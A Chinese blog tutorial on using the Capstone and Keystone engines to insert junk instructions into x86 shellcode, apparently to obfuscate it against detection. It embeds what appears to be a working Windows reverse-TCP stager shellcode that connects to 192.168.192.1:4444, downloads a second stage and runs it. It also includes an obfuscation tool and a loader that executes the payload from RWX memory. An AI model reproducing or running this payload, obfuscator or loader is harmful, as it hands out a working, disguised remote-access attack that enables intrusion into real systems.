Capstone+Keystone实现花指令

0.简介

汇编和反汇编的过程,就是硬编码(二进制机器码)和汇编指令之间的相互转化。最直白的方式,就是直接查intel的白皮书,具体转换方法可以参考《二进制入门学习笔记-14.windows硬编码》。自己翻手册实现这个过程显然很繁琐,不过好在已经有Keystone和Capstone两大神器实现了需求。

  • Capstone:目前世界上最优秀的反汇编引擎,ida工具都是使用的该反汇编引擎。可以快速将硬编码转换为汇编语句。详情见Capstone官网
  • Keystone:开源的轻量级多平台、多架构汇编框架,可以实现从汇编语句转换为硬编码。详情见Keystone官网

1.开发环境配置

所用编辑器为Microsoft Visual Studio 2019,操作系统为Win10 X64。

1.1 Capstone开发环境

Capstone安装非常简单,在Github仓库中选取所需要的release版本即可,这里我下载的是64位版本的。解压完成后即可看到如下文件: 这里的lib文件和dll文件可以直接在我目前的开发环境下使用。include文件夹中包含的capstone文件夹中,还有开发时所需要的头文件。我这里使用静态链接库进行开发,开发时只需将capstone.lib和include/capstone文件夹拖入项目并导入即可。

1.2 Keystone开发环境

Keystone官方提供的版本编译环境较为老旧,无法在当前环境下使用。需要自己重新编译,下载源码包并解压。这里我想要编译x64的lib,因此使用x64 Native Tools Command Prompt for VS 2019进行编译。 编译方法如下:

cd C:\Users\crls\Desktop\keystone-0.9.1
mkdir build
cd build
..\nmake-lib.bat

编译完成后会在build\llvm\lib目录下生成keystone.lib文件。 使用时,将该keystone.lib文件和/include/目录下的keystone目录均复制到项目文件夹并导入即可。

1.3 测试开发环境

新建一个空项目,并导入所需的lib库和头文件。 主文件中写入如下代码:

#include <iostream>
#include <stdio.h>
#include <cinttypes>  
#include "capstone/capstone.h"
#include "keystone/keystone.h"
using namespace std;

#define CODE1 "\x41\x4a\xb8\x78\x56\x34\x12"
#define CODE2 "INC ecx; DEC edx;mov eax,0x12345678"
void testCapstone(void)
{
    csh handle;
    cs_insn* insn;
    size_t count;
    if (cs_open(CS_ARCH_X86, CS_MODE_32, &handle)) {
        printf("ERROR: Failed to initialize engine!\n");
    }
    count = cs_disasm(handle, (unsigned char*)CODE1, sizeof(CODE1) - 1, 0x1000, 0, &insn);
    if (count) {
        size_t j;

        for (j = 0; j < count; j++) {
            printf("0x%""Ix"":\t%s\t\t%s\n", insn[j].address, insn[j].mnemonic, insn[j].op_str);
        }

        cs_free(insn, count);
    }
    else
        printf("ERROR: Failed to disassemble given code!\n");

    cs_close(&handle);
}
void testKeystone(void)
{
    ks_engine* ks;
    ks_err err;
    size_t count;
    unsigned char* encode;
    size_t size;

    err = ks_open(KS_ARCH_X86, KS_MODE_32, &ks);
    if (err != KS_ERR_OK) {
        printf("ERROR: failed on ks_open(), quit\n");
    }

    if (ks_asm(ks, CODE2, 0, &encode, &size, &count) != KS_ERR_OK) {
        printf("ERROR: ks_asm() failed & count = %lu, error = %u\n",
            count, ks_errno(ks));
    }
    else {
        size_t i;

        printf("%s = ", CODE2);
        for (i = 0; i < size; i++) {
            printf("%02x ", encode[i]);
        }
        printf("\n");
        printf("Compiled: %lu bytes, statements: %lu\n", size, count);
    }

    // NOTE: free encode after usage to avoid leaking memory
    ks_free(encode);

    // close Keystone instance when done
    ks_close(ks);
}
/**
 * Entry point of the environment check: runs the Capstone demo and then the
 * Keystone demo, each framed by a banner line before and after.
 */
int main(int argc, char** argv) {
    (void)argc;
    (void)argv;

    const char* const capstoneBanner = "------------Capstone测试结果------------\n";
    const char* const keystoneBanner = "------------Keystone测试结果------------\n";

    fputs(capstoneBanner, stdout);
    testCapstone();
    fputs(capstoneBanner, stdout);

    fputs("\n\n", stdout);

    fputs(keystoneBanner, stdout);
    testKeystone();
    fputs(keystoneBanner, stdout);

    return 0;
}

运行结果如下:

2.实现代码

以下代码参考了别人Python版本的思路。先把shellcode转换成字符串形式的汇编指令。然后遍历每一条汇编指令,给每一个跳转点都起上名字,通过这个名字进行跳转。然后添加花指令,再使用keystone将字符串形式的汇编指令转换成shellcode。

#include <stdio.h>
#include <string.h>

#include <cinttypes>
#include <cstdlib>
#include <iostream>
#include <string>
#include <vector>

#include "capstone/capstone.h"
#include "keystone/keystone.h"
using namespace std;


string getOpCodeFromAssemblyCode(string assemblyCode)
{
    string res;
    ks_engine* ks;
    ks_err err;
    size_t count;
    unsigned char* encode;
    size_t size;

    err = ks_open(KS_ARCH_X86, KS_MODE_32, &ks);
    if (err != KS_ERR_OK) {
        printf("ERROR: failed on ks_open(), quit\n");
    }

    if (ks_asm(ks, assemblyCode.data(), 0, &encode, &size, &count) != KS_ERR_OK) {
        printf("ERROR: ks_asm() failed & count = %lu, error = %u\n",
            count, ks_errno(ks));
    }
    else {
        size_t i;
        for (i = 0; i < size; i++) {
            char szTmp[3];
            sprintf_s(szTmp, "%02x", encode[i]);
            res += "\\x";
            res += szTmp;
            //printf("\\x%02x", encode[i]);
        }
        //printf("\n");
        //printf("Compiled: %lu bytes, statements: %lu\n", size, count);
        ks_free(encode);
        ks_close(ks);
        return res;
    }
}
/**
 * Maps a byte offset (from the start of the code) to the index of the
 * instruction that begins at that offset.
 *
 * @param offset              Byte offset to look up.
 * @param assemblyCodeLength  Number of entries in opCodeLenArray.
 * @param opCodeLenArray      Encoded length in bytes of each instruction,
 *                            in program order.
 * @return The instruction index whose first byte is at `offset`. Offset 0
 *         yields 0. An offset equal to the total length of all instructions
 *         yields assemblyCodeLength (one past the last instruction). Returns
 *         -1 when the offset is negative, lies inside an instruction, or is
 *         beyond the end of the code.
 */
int offSetToIndex(int offset, int assemblyCodeLength, int opCodeLenArray[]) {
    if (offset == 0) {
        return 0;  // the first instruction starts at offset 0
    }
    if (offset < 0 || opCodeLenArray == nullptr) {
        return -1;
    }

    int remaining = offset;
    for (int i = 0; i < assemblyCodeLength; i++) {
        remaining -= opCodeLenArray[i];
        if (remaining == 0) {
            return i + 1;  // instruction i ends exactly where the target begins
        }
        if (remaining < 0) {
            break;  // the offset points into the middle of instruction i
        }
    }
    return -1;
}
void addThunkCode(char CODE1[], int codeLen, string tunkCode)
{
    string controlflow[] = { "jmp", "jz", "jnz", "je", "jne", "call", "jl", "ja", "loop", "jecxz", "jle", "jge", "jg", "jp", "jnl" };
    string registers[] = { "eax", "ecx","edx", "ebx", "esp", "ebp", "esi", "edi" };
    string assemblyCodeArray[4000];//存储汇编代码
    int opCodeLenArray[4000];//存储每条汇编指令opcode的长度
    int assemblyCodeWithControlflow[4000];//存储包含控制流的汇编代码编号
    int numOfAssemblyCodeWithControlflow = 0;
    int numOfassemblyCodeToJumpTo = 0;
    int assemblyCodeToJumpTo[4000];
    size_t assemblyCodeLength=0;
    /*---获取反汇编结果数组assemblyCodeArray---*/
    csh handle;
    cs_insn* insn;
    if (cs_open(CS_ARCH_X86, CS_MODE_32, &handle)) {
        printf("ERROR: Failed to initialize engine!\n");
    }
    cs_option(handle, CS_OPT_SKIPDATA, CS_OPT_ON);//跳过数据
    assemblyCodeLength = cs_disasm(handle, (unsigned char*)CODE1, codeLen - 1, 0x0, 0, &insn);
    if (assemblyCodeLength) {
        for (size_t i = 0; i < assemblyCodeLength; i++) {
            /*
            printf("0x%""Ix"":\t%s\t\t%s\t", insn[i].address, insn[i].mnemonic, insn[i].op_str);
            for (int k = 0; k < insn[i].size; k++) {
                printf("/x%x", insn[i].bytes[k]);
            }
            printf("\n");
            */
            opCodeLenArray[i] = insn[i].size;
            assemblyCodeArray[i] = insn[i].mnemonic;
            assemblyCodeArray[i] += " ";
            if (strlen(insn[i].op_str)==1) {//防止奇葩情况,如果是一位数没有0x
                assemblyCodeArray[i] += "0x";
            }
            assemblyCodeArray[i] += insn[i].op_str;
        }
        printf("------1.反汇编结果------\n");
        for (size_t i = 0; i < assemblyCodeLength; i++) {
            printf("%d:  %s\n", i, assemblyCodeArray[i].data());
        }
        printf("------1.反汇编结果------\n\n\n");
    }
    else {
        printf("ERROR: Failed to disassemble given code!\n");
    }
    /*获取反汇编结果数组assemblyCodeArray*/

    printf("-------查找跳转指令-------\n");
    /*获取所有包含跳转但操作数不是寄存器的汇编代码编号*/
    for (int i = 0; i < assemblyCodeLength; i++) {
        bool hasControlflow = false;//保存汇编代码中是否包含跳转代码
        bool hasRegisters = false;//保存汇编代码中是否包含寄存器
        for (int j = 0; j < (sizeof(controlflow)/sizeof(controlflow[0])); j++) {
            if (assemblyCodeArray[i].find(controlflow[j])!=-1) {
                hasControlflow = true;
                string tmpOpst=insn[i].op_str;
                for (int k = 0; k < (sizeof(registers) / sizeof(registers[0])); k++) {
                    if (tmpOpst.find(registers[k]) != -1) {
                        hasRegisters = true;
                    }
                }
            }
        }
        if ((hasControlflow == true) && (hasRegisters == false)) {
            assemblyCodeWithControlflow[numOfAssemblyCodeWithControlflow] = i;
            printf("发现第%d行汇编代码中包含跳转指令,汇编代码为:%s\n", assemblyCodeWithControlflow[numOfAssemblyCodeWithControlflow], assemblyCodeArray[i]);
            numOfAssemblyCodeWithControlflow++;
        }
    }
    printf("-------查找跳转指令-------\n\n");
    /*获取所有包含跳转但操作数不是寄存器的汇编代码编号*/


    /*给所有被跳转到的位置加上一个名字,并使用名字完成跳转*/
    printf("-------对跳转到的位置标签化-------\n");
    for (int i = 0; i < numOfAssemblyCodeWithControlflow; i++) {
        int pos = -1; //0x的位置
        int offSet = -1;//原始的偏移
        int index = -1; //跳转对应汇编代价的序号
        string tmpAssemblyCode;
        tmpAssemblyCode = assemblyCodeArray[assemblyCodeWithControlflow[i]];
        pos = tmpAssemblyCode.find("0x");
        offSet = atof(tmpAssemblyCode.substr(pos,tmpAssemblyCode.length()).c_str());
        index = offSetToIndex(offSet, assemblyCodeLength, opCodeLenArray);
        char strIndex[1000];//存储字符串形式的index
        _itoa_s(index, strIndex, 10);

        //将跳转位置替换成标签
        tmpAssemblyCode = assemblyCodeArray[assemblyCodeWithControlflow[i]].substr(0,pos);
        tmpAssemblyCode += "jus4fun";
        tmpAssemblyCode += strIndex;
        assemblyCodeArray[assemblyCodeWithControlflow[i]] = tmpAssemblyCode;
        //判断跳转到的位置是否已经添加标签
        bool isAddName = false;
        for (int j = 0; j < numOfassemblyCodeToJumpTo; j++) {
            if (assemblyCodeToJumpTo[j] == index) {
                isAddName = true;
            }
        }
        if (!isAddName) {
            assemblyCodeToJumpTo[numOfassemblyCodeToJumpTo] = index;
            string tmpAssemblyCode = "jus4fun";
            tmpAssemblyCode += strIndex;
            tmpAssemblyCode += ": ";
            tmpAssemblyCode += assemblyCodeArray[index];
            assemblyCodeArray[index] = tmpAssemblyCode;
            printf("对第%d行跳转到的代码进行标签化中,标签化结果为%s\n", index, tmpAssemblyCode.c_str());
            numOfassemblyCodeToJumpTo++;
        }
        //printf("第%d行的跳转进行标签中,跳转对应代码位置为:%d\n", assemblyCodeWithControlflow[i], index);
    }
    printf("已对%d行代码完成标签化\n", numOfassemblyCodeToJumpTo);
    printf("-------对跳转到的位置标签化-------\n");
    /*给所有被跳转到的位置加上一个名字*/

    /*添加花指令*/
    string assemblyCodeRes;
    for (size_t i = 0; i < assemblyCodeLength; i++) {
        assemblyCodeRes += assemblyCodeArray[i];
        assemblyCodeRes += ";";
        assemblyCodeRes += tunkCode;
        printf("%d:  %s\n", i, assemblyCodeArray[i].data());
    }
    printf("\n\n------添加花指令后的代码汇编代码如下------\n");
    printf("%s",assemblyCodeRes.data());
    /*添加花指令*/

    /*输出加花后的硬编码*/
    printf("\n\n------添加花指令后的硬编码如下------\n");
    cout << getOpCodeFromAssemblyCode(assemblyCodeRes) << endl;
    /*输出加花后的硬编码*/

    /*释放打开的句柄*/
    cs_free(insn, assemblyCodeLength);
    cs_close(&handle);
    /*释放打开的句柄*/

}
int main(int argc, char** argv) {
    char CODE1[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xc0\x01\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
    int codeLen = sizeof(CODE1);
    string tunkCode = "NOP;";
    addThunkCode(CODE1, codeLen, tunkCode);
}

使用如下代码对加花前和加花后代码做简单的加载器进行测试:

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main()
{
    char str[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xc0\x01\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
    void* exec = VirtualAlloc(0,sizeof(str),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    memcpy(exec,str,sizeof(str));
    ((void(*)())exec)();
}

结果如下: